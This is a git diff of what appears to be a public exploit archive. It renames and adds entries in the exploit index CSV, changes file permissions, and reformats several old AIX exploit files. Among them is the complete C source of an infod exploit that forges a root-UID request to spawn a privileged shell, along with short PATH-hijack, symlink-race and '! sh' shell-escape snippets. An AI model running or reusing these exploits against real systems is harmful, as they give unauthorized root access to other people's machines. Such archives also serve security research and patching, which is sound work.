35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 - Unauthenticated SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0 @@ -35423,7 +35424,7 @@ id,file,description,date,author,platform,type,port 36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross-Site Scripting",2011-10-28,"599eme Man",php,webapps,0 36272,platforms/php/webapps/36272.txt,"Domain Shop - 'index.php' Cross-Site Scripting",2011-11-01,Mr.PaPaRoSSe,php,webapps,0 36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 - Multiple Remote File Inclusions",2011-11-01,indoushka,php,webapps,0 -36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 - Cross-Site Scripting / Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0 +36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 - Cross-Site Scripting / Multiple Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0 36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) - 'str' Cross-Site Scripting",2011-11-01,Isfahan,php,webapps,0 36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0 36282,platforms/php/webapps/36282.txt,"eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injections",2011-11-02,"High-Tech Bridge SA",php,webapps,0 @@ -36069,7 +36070,7 @@ id,file,description,date,author,platform,type,port 37217,platforms/php/webapps/37217.txt,"ArtiPHP 5.5.0 Neo - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",php,webapps,0 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 -37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 +37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Security Exploit",2012-05-17,anonymous,jsp,webapps,0 37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/file_upload_submit.asp' Multiple Arbitrary File Upload / Code Executions",2012-05-21,"Aung Khant",asp,webapps,0 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp?path' Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0 @@ -36478,7 +36479,7 @@ id,file,description,date,author,platform,type,port 37926,platforms/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0 37927,platforms/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0 37928,platforms/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection / Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 -37929,platforms/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass Issue",2015-08-21,"Anastasios Monachos",php,webapps,0 +37929,platforms/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 @@ -36580,7 +36581,7 @@ id,file,description,date,author,platform,type,port 38112,platforms/php/webapps/38112.txt,"FOOT Gestion - 'id' SQL Injection",2012-12-07,"Emmanuel Farcy",php,webapps,0 38113,platforms/php/webapps/38113.php,"vBulletin ajaxReg Module - SQL Injection",2012-12-08,"Cold Zero",php,webapps,0 38114,platforms/cgi/webapps/38114.html,"Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps,0 -38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module - Unspecified Customer Field Cross-Site Scripting",2012-12-10,tommccredie,php,webapps,0 +38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module - Customer Field Cross-Site Scripting",2012-12-10,tommccredie,php,webapps,0 38118,platforms/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XML External Entity Injection",2015-09-09,"Alex Haynes",xml,webapps,0 38119,platforms/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - Cross-Site Request Forgery",2015-09-09,"Aryan Bayaninejad",php,webapps,0 38127,platforms/php/webapps/38127.php,"PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function",2015-09-10,ylbhz,php,webapps,0 @@ -36923,7 +36924,7 @@ id,file,description,date,author,platform,type,port 38800,platforms/php/webapps/38800.txt,"FreeSMS - '/pages/crc_handler.php?scheduleid' SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0 38801,platforms/php/webapps/38801.txt,"FreeSMS - '/pages/crc_handler.php' Multiple Cross-Site Scripting Vulnerabilities",2013-09-27,"Sarahma Security",php,webapps,0 38806,platforms/cgi/webapps/38806.txt,"Bugzilla - 'editflagtypes.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-10-09,"Mateusz Goik",cgi,webapps,0 -38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 - Tabular Reports Unspecified Cross-Site Scripting",2013-10-09,"Mateusz Goik",cgi,webapps,0 +38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 - Tabular Reports Cross-Site Scripting",2013-10-09,"Mateusz Goik",cgi,webapps,0 38808,platforms/php/webapps/38808.txt,"WordPress Plugin WP-Realty - 'listing_id' SQL Injection",2013-10-08,Napsterakos,php,webapps,0 38811,platforms/php/webapps/38811.txt,"WordPress Theme Daily Deal - Arbitrary File Upload",2013-10-23,DevilScreaM,php,webapps,0 38814,platforms/php/webapps/38814.php,"Joomla! Component Maian15 - 'name' Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0 @@ -36973,7 +36974,7 @@ id,file,description,date,author,platform,type,port 38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - 'additionalsettings.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster - 'invno' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 -38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster - 'main_smtp.php' Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0 +38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster - 'main_smtp.php' Traversal Exploit",2013-12-15,i-Hmx,php,webapps,0 38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster - 'tmpid' Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster - 'fname' Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster - 'id' Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 @@ -37370,7 +37371,7 @@ id,file,description,date,author,platform,type,port 39798,platforms/hardware/webapps/39798.txt,"JVC HDRs / Net (Multiple Cameras) - Multiple Vulnerabilities",2016-05-10,Orwelllabs,hardware,webapps,80 39806,platforms/php/webapps/39806.txt,"WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 39807,platforms/php/webapps/39807.txt,"WordPress Plugin Huge-IT Image Gallery 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 -39808,platforms/windows/webapps/39808.txt,"Trend Micro - 'CoreServiceShell.exe' Multiple HTTP Issues",2016-05-12,"Google Security Research",windows,webapps,37848 +39808,platforms/windows/webapps/39808.txt,"Trend Micro - 'CoreServiceShell.exe' Multiple HTTP Exploits",2016-05-12,"Google Security Research",windows,webapps,37848 39883,platforms/php/webapps/39883.txt,"WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80 39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80 39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps,0 @@ -37401,7 +37402,7 @@ id,file,description,date,author,platform,type,port 40463,platforms/cgi/webapps/40463.txt,"Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution",2016-10-05,KoreLogic,cgi,webapps,0 39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-06,"Ali Ghanbari",php,webapps,80 39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0 -39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Exploit (Shellshock)",2016-06-06,lastc0de,cgi,webapps,80 +39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)",2016-06-06,lastc0de,cgi,webapps,80 39889,platforms/php/webapps/39889.html,"ArticleSetup 1.00 - Cross-Site Request Forgery (Change Admin Password)",2016-06-06,"Ali Ghanbari",php,webapps,80 39890,platforms/php/webapps/39890.txt,"Electroweb Online Examination System 1.0 - SQL Injection",2016-06-06,"Ali Ghanbari",php,webapps,80 39891,platforms/php/webapps/39891.txt,"WordPress Plugin WP Mobile Detector 3.5 - Arbitrary File Upload",2016-06-06,"Aaditya Purani",php,webapps,80 @@ -37537,7 +37538,7 @@ id,file,description,date,author,platform,type,port 40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - Cross-Site Request Forgery (Add Admin)",2016-08-06,LiquidWorm,php,webapps,80 40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80 40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injections",2016-08-06,LiquidWorm,php,webapps,80 -40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - Remote Code Execution (Shellshock)",2016-08-06,LiquidWorm,cgi,webapps,80 +40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock)",2016-08-06,LiquidWorm,cgi,webapps,80 40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80 40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80 40216,platforms/jsp/webapps/40216.txt,"Navis Webaccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000 @@ -38742,6 +38743,7 @@ id,file,description,date,author,platform,type,port 42988,platforms/php/webapps/42988.txt,"AlienVault Unified Security Management (USM) 5.4.2 - Cross-Site Request Forgery",2017-10-13,"Julien Ahrens",php,webapps,0 42989,platforms/cgi/webapps/42989.txt,"Webmin 1.850 - Multiple Vulnerabilities",2017-10-15,hyp3rlinx,cgi,webapps,0 42991,platforms/linux/webapps/42991.txt,"3CX Phone System 15.5.3554.1 - Directory Traversal",2017-10-16,"Jens Regel",linux,webapps,0 +42993,platforms/php/webapps/42993.txt,"Squid Analysis Report Generator 2.3.10 - Remote Code Execution",2017-10-17,"Pavel Suprunyuk",php,webapps,0 43002,platforms/multiple/webapps/43002.py,"OpenText Documentum Content Server - Privilege Escalation",2017-10-17,"Andrey B. Panfilov",multiple,webapps,0 43003,platforms/multiple/webapps/43003.py,"OpenText Documentum Content Server - Arbitrary File Download Privilege Escalation",2017-10-17,"Andrey B. Panfilov",multiple,webapps,0 43004,platforms/multiple/webapps/43004.py,"OpenText Documentum Content Server - 'dmr_content' Privilege Escalation",2017-10-17,"Andrey B. Panfilov",multiple,webapps,0 diff --git a/platforms/aix/dos/19041.txt b/platforms/aix/dos/19041.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/dos/19043.txt b/platforms/aix/dos/19043.txt old mode 100755 new mode 100644 index 193683bf2..c9e971481 --- a/platforms/aix/dos/19043.txt +++ b/platforms/aix/dos/19043.txt @@ -13,4 +13,4 @@ $ set PATH=/tmp:$PATH $ export PATH $ /usr/bin/winstall $ /tmp/sh -# \ No newline at end of file +# \ No newline at end of file diff --git a/platforms/aix/dos/19045.txt b/platforms/aix/dos/19045.txt old mode 100755 new mode 100644 index a4c934dd2..816c8051c --- a/platforms/aix/dos/19045.txt +++ b/platforms/aix/dos/19045.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/59/info /etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem. $ /etc/crash -! sh \ No newline at end of file +! sh \ No newline at end of file diff --git a/platforms/aix/dos/19046.txt b/platforms/aix/dos/19046.txt old mode 100755 new mode 100644 index dbc0c3b7a..ece7403f7 --- a/platforms/aix/dos/19046.txt +++ b/platforms/aix/dos/19046.txt @@ -12,4 +12,4 @@ HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX [ and it just hangs ] $ ping some.where -[ ...nothing... ] \ No newline at end of file +[ ...nothing... ] \ No newline at end of file diff --git a/platforms/aix/dos/19049.txt b/platforms/aix/dos/19049.txt old mode 100755 new mode 100644 index 8ff9b94ad..6fcbe7106 --- a/platforms/aix/dos/19049.txt +++ b/platforms/aix/dos/19049.txt @@ -7,4 +7,4 @@ $ nmap -p 1-64000 -i It is also claimed inetd will die if the Windows 95/NT program postscan.exe, made by 7thsphere, is run againts -the host. \ No newline at end of file +the host. \ No newline at end of file diff --git a/platforms/aix/dos/22249.txt b/platforms/aix/dos/22249.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/dos/25807.txt b/platforms/aix/dos/25807.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/dos/33943.txt b/platforms/aix/dos/33943.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/dos/34588.txt b/platforms/aix/dos/34588.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/dos/35342.txt b/platforms/aix/dos/35342.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/local/1001.txt b/platforms/aix/local/1001.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/local/1044.c b/platforms/aix/local/1044.c old mode 100755 new mode 100644 diff --git a/platforms/aix/local/1045.c b/platforms/aix/local/1045.c old mode 100755 new mode 100644 diff --git a/platforms/aix/local/1046.c b/platforms/aix/local/1046.c old mode 100755 new mode 100644 diff --git a/platforms/aix/local/19214.c b/platforms/aix/local/19214.c old mode 100755 new mode 100644 diff --git a/platforms/aix/local/19215.c b/platforms/aix/local/19215.c old mode 100755 new mode 100644 index 1fbf2f8ad..5cab6d212 --- a/platforms/aix/local/19215.c +++ b/platforms/aix/local/19215.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges. +*/ /*============================================================ ex_lobc.c Overflow Exploits( for Sparc Edition) diff --git a/platforms/aix/local/19216.c b/platforms/aix/local/19216.c old mode 100755 new mode 100644 diff --git a/platforms/aix/local/19217.c b/platforms/aix/local/19217.c old mode 100755 new mode 100644 index a31f29c3f..5055a831d --- a/platforms/aix/local/19217.c +++ b/platforms/aix/local/19217.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges. +*/ /*============================================================ ex_lobc.c Overflow Exploits( for Sparc Edition) diff --git a/platforms/aix/local/19229.txt b/platforms/aix/local/19229.txt old mode 100755 new mode 100644 index cd8470c0e..81069e150 --- a/platforms/aix/local/19229.txt +++ b/platforms/aix/local/19229.txt @@ -11,4 +11,4 @@ ln -s /etc/passwd /tmp/fwlsuser.$x let x=$x+1 echo $x done -exit \ No newline at end of file +exit \ No newline at end of file diff --git a/platforms/aix/local/19287.c b/platforms/aix/local/19287.c old mode 100755 new mode 100644 index 939d45f1a..9e334bcd9 --- a/platforms/aix/local/19287.c +++ b/platforms/aix/local/19287.c @@ -1,226 +1,226 @@ +/* source: http://www.securityfocus.com/bid/370/info Certain versions of AIX ship with an Information Daemon, infod. This program is designed to provide information about the OS and installed ancilliary programs. The daemon which runs as root, does not check credentials which are passed to it. This allows users to pass requests with arbitrary UID's. If a user passes infod a request as root, they can goto the default options menu and change the printer command line to an alternate binary such as /bin/sh that gives privileges to the account the session was spawned under. +*/ - /* Infod AIX exploit (k) Arisme 21/11/98 - All Rights Reversed - Based on RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com) +/* Infod AIX exploit (k) Arisme 21/11/98 - All Rights Reversed + Based on RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com) - Run program with the login you want to exploit :) - When the window appears, select "options", "defaults", change printer - to something more useful (like /bin/x11/xterm) and print ! + Run program with the login you want to exploit :) + When the window appears, select "options", "defaults", change printer + to something more useful (like /bin/x11/xterm) and print ! - Comments,questions : arisme@altern.org */ + Comments,questions : arisme@altern.org */ - #include - #include - #include - #include - #include - #include - #include +#include +#include +#include +#include +#include +#include +#include - #define TAILLE_BUFFER 2000 - #define SOCK_PATH "/tmp/.info-help" - #define PWD "/tmp" +#define TAILLE_BUFFER 2000 +#define SOCK_PATH "/tmp/.info-help" +#define PWD "/tmp" - #define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-0 -9-98.AIX.INFOD (http://www.repsec.com)" - #define NOUSER "Use : infofun [login]" - #define UNKNOWN "User does not exist !" - #define OK "Waiting for magic window ... if you have problems check the xho -st " +#define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)" +#define NOUSER "Use : infofun [login]" +#define UNKNOWN "User does not exist !" +#define OK "Waiting for magic window ... if you have problems check the xhost " - void send_environ(char *var,FILE *param) - { char tempo[TAILLE_BUFFER]; - int taille; +void send_environ(char *var,FILE *param) +{ char tempo[TAILLE_BUFFER]; + int taille; - taille=strlen(var); - sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0); - fwrite(tempo,1,taille+4,param); - } + taille=strlen(var); + sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0); + fwrite(tempo,1,taille+4,param); +} - main(int argc,char** argv) - { struct sockaddr_un sin,expediteur; - struct hostent *hp; - struct passwd *info; - int chaussette,taille_expediteur,port,taille_struct,taille_param; - char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur; - FILE *param; +main(int argc,char** argv) +{ struct sockaddr_un sin,expediteur; + struct hostent *hp; + struct passwd *info; + int chaussette,taille_expediteur,port,taille_struct,taille_param; + char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur; + FILE *param; - char *HOME,*LOGIN; - int UID,GID; + char *HOME,*LOGIN; + int UID,GID; - printf("\n\n%s\n\n",KOPY); + printf("\n\n%s\n\n",KOPY); - if (argc!=2) { printf("%s\n",NOUSER); - exit(1); } + if (argc!=2) { printf("%s\n",NOUSER); + exit(1); } - info=getpwnam(argv[1]); - if (!info) { printf("%s\n",UNKNOWN); - exit(1); } + info=getpwnam(argv[1]); + if (!info) { printf("%s\n",UNKNOWN); + exit(1); } - HOME=info->pw_dir; - LOGIN=info->pw_name; - UID=info->pw_uid; - GID=info->pw_gid; + HOME=info->pw_dir; + LOGIN=info->pw_name; + UID=info->pw_uid; + GID=info->pw_gid; - param=fopen("/tmp/tempo.fun","wb"); + param=fopen("/tmp/tempo.fun","wb"); - chaussette=socket(AF_UNIX,SOCK_STREAM,0); - sin.sun_family=AF_UNIX; - strcpy(sin.sun_path,SOCK_PATH); - taille_struct=sizeof(struct sockaddr_un); + chaussette=socket(AF_UNIX,SOCK_STREAM,0); + sin.sun_family=AF_UNIX; + strcpy(sin.sun_path,SOCK_PATH); + taille_struct=sizeof(struct sockaddr_un); - if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0) - { perror("connect"); - exit(1); } + if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0) + { perror("connect"); + exit(1); } - /* 0 0 PF_UID pf_UID 0 0 */ + /* 0 0 PF_UID pf_UID 0 0 */ - sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0); - fwrite(buffer,1,6,param); + sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0); + fwrite(buffer,1,6,param); - /* PF_GID pf_GID */ - sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256)); - fwrite(buffer,1,2,param); + /* PF_GID pf_GID */ + sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256)); + fwrite(buffer,1,2,param); - /* DISPLAY (259) */ + /* DISPLAY (259) */ - bzero(buffer,TAILLE_BUFFER); - strcpy(buffer,getenv("DISPLAY")); - fwrite(buffer,1,259,param); + bzero(buffer,TAILLE_BUFFER); + strcpy(buffer,getenv("DISPLAY")); + fwrite(buffer,1,259,param); - /* LANG (1 C 0 0 0 0 0 0 0) */ + /* LANG (1 C 0 0 0 0 0 0 0) */ - sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0); - fwrite(buffer,1,9,param); + sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0); + fwrite(buffer,1,9,param); - /* size_$HOME $HOME 0 0 0 */ + /* size_$HOME $HOME 0 0 0 */ - send_environ(HOME,param); + send_environ(HOME,param); - /* size_$LOGNAME $LOGNAME 0 0 0 */ + /* size_$LOGNAME $LOGNAME 0 0 0 */ - send_environ(LOGIN,param); + send_environ(LOGIN,param); - /* size_$USERNAME $USERNAME 0 0 0 */ + /* size_$USERNAME $USERNAME 0 0 0 */ - send_environ(LOGIN,param); + send_environ(LOGIN,param); - /* size_$PWD $PWD 0 0 0 */ + /* size_$PWD $PWD 0 0 0 */ - send_environ(PWD,param); + send_environ(PWD,param); - /* size_DISPLAY DISPLAY 0 0 0 */ + /* size_DISPLAY DISPLAY 0 0 0 */ - //send_environ(ptsname(0),param); + //send_environ(ptsname(0),param); - /* If we send our pts, info_gr will crash as it has already changed UID * + /* If we send our pts, info_gr will crash as it has already changed UID * / - send_environ("/dev/null",param); + send_environ("/dev/null",param); - /* It's probably not useful to copy all these environment vars but it was - good for debugging :) */ + /* It's probably not useful to copy all these environment vars but it was + good for debugging :) */ - sprintf(buffer,"%c%c%c%c",23,0,0,0); - fwrite(buffer,1,4,param); + sprintf(buffer,"%c%c%c%c",23,0,0,0); + fwrite(buffer,1,4,param); - sprintf(buffer,"_=./startinfo"); - send_environ(buffer,param); + sprintf(buffer,"_=./startinfo"); + send_environ(buffer,param); - sprintf(buffer,"TMPDIR=/tmp"); - send_environ(buffer,param); + sprintf(buffer,"TMPDIR=/tmp"); + send_environ(buffer,param); - sprintf(buffer,"LANG=%s",getenv("LANG")); - send_environ(buffer,param); + sprintf(buffer,"LANG=%s",getenv("LANG")); + send_environ(buffer,param); - sprintf(buffer,"LOGIN=%s",LOGIN); - send_environ(buffer,param); + sprintf(buffer,"LOGIN=%s",LOGIN); + send_environ(buffer,param); - sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH")); - send_environ(buffer,param); + sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH")); + send_environ(buffer,param); - sprintf(buffer,"PATH=%s",getenv("PATH")); - send_environ(buffer,param); + sprintf(buffer,"PATH=%s",getenv("PATH")); + send_environ(buffer,param); - sprintf(buffer,"%s","EDITOR=emacs"); - send_environ(buffer,param); + sprintf(buffer,"%s","EDITOR=emacs"); + send_environ(buffer,param); - sprintf(buffer,"LOGNAME=%s",LOGIN); - send_environ(buffer,param); + sprintf(buffer,"LOGNAME=%s",LOGIN); + send_environ(buffer,param); - sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN); - send_environ(buffer,param); + sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN); + send_environ(buffer,param); - sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME")); - send_environ(buffer,param); + sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME")); + send_environ(buffer,param); - sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH")); - send_environ(buffer,param); - - sprintf(buffer,"%s","PS1=(exploited !) "); - send_environ(buffer,param); + sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH")); + send_environ(buffer,param); - sprintf(buffer,"USER=%s",LOGIN); - send_environ(buffer,param); + sprintf(buffer,"%s","PS1=(exploited !) "); + send_environ(buffer,param); - sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE")); - send_environ(buffer,param); + sprintf(buffer,"USER=%s",LOGIN); + send_environ(buffer,param); - sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY")); - send_environ(buffer,param); + sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE")); + send_environ(buffer,param); - sprintf(buffer,"SHELL=%s",getenv("SHELL")); - send_environ(buffer,param); + sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY")); + send_environ(buffer,param); - sprintf(buffer,"%s","ODMDIR=/etc/objrepos"); - send_environ(buffer,param); + sprintf(buffer,"SHELL=%s",getenv("SHELL")); + send_environ(buffer,param); - sprintf(buffer,"HOME=%s",HOME); - send_environ(buffer,param); + sprintf(buffer,"%s","ODMDIR=/etc/objrepos"); + send_environ(buffer,param); - sprintf(buffer,"%s","TERM=vt220"); - send_environ(buffer,param); + sprintf(buffer,"HOME=%s",HOME); + send_environ(buffer,param); - sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]"); - send_environ(buffer,param); + sprintf(buffer,"%s","TERM=vt220"); + send_environ(buffer,param); - sprintf(buffer,"PWD=%s",PWD); - send_environ(buffer,param); + sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]"); + send_environ(buffer,param); - sprintf(buffer,"%s","TZ=NFT-1"); - send_environ(buffer,param); + sprintf(buffer,"PWD=%s",PWD); + send_environ(buffer,param); - sprintf(buffer,"%s","A__z=! LOGNAME"); - send_environ(buffer,param); + sprintf(buffer,"%s","TZ=NFT-1"); + send_environ(buffer,param); - /* Start info_gr with -q parameter or the process will be run locally and - not from the daemon ... */ + sprintf(buffer,"%s","A__z=! LOGNAME"); + send_environ(buffer,param); - sprintf(buffer,"%c%c%c%c",1,45,113,0); - fwrite(buffer,1,4,param); + /* Start info_gr with -q parameter or the process will be run locally and + not from the daemon ... */ - fclose(param); + sprintf(buffer,"%c%c%c%c",1,45,113,0); + fwrite(buffer,1,4,param); - param=fopen("/tmp/tempo.fun","rb"); - fseek(param,0,SEEK_END); - taille_param=ftell(param); - fseek(param,0,SEEK_SET); - fread(paramz,1,taille_param,param); - fclose(param); + fclose(param); - unlink("/tmp/tempo.fun"); + param=fopen("/tmp/tempo.fun","rb"); + fseek(param,0,SEEK_END); + taille_param=ftell(param); + fseek(param,0,SEEK_SET); + fread(paramz,1,taille_param,param); + fclose(param); - /* Thank you Mr daemon :) */ + unlink("/tmp/tempo.fun"); - write(chaussette,paramz,taille_param); + /* Thank you Mr daemon :) */ - printf("\n%s %s\n",OK,getenv("HOSTNAME")); + write(chaussette,paramz,taille_param); - close(chaussette); - } \ No newline at end of file + printf("\n%s %s\n",OK,getenv("HOSTNAME")); + + close(chaussette); +} \ No newline at end of file diff --git a/platforms/aix/local/19300.txt b/platforms/aix/local/19300.txt old mode 100755 new mode 100644 index 5aa103fb4..e3580de0b --- a/platforms/aix/local/19300.txt +++ b/platforms/aix/local/19300.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/375/info The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing 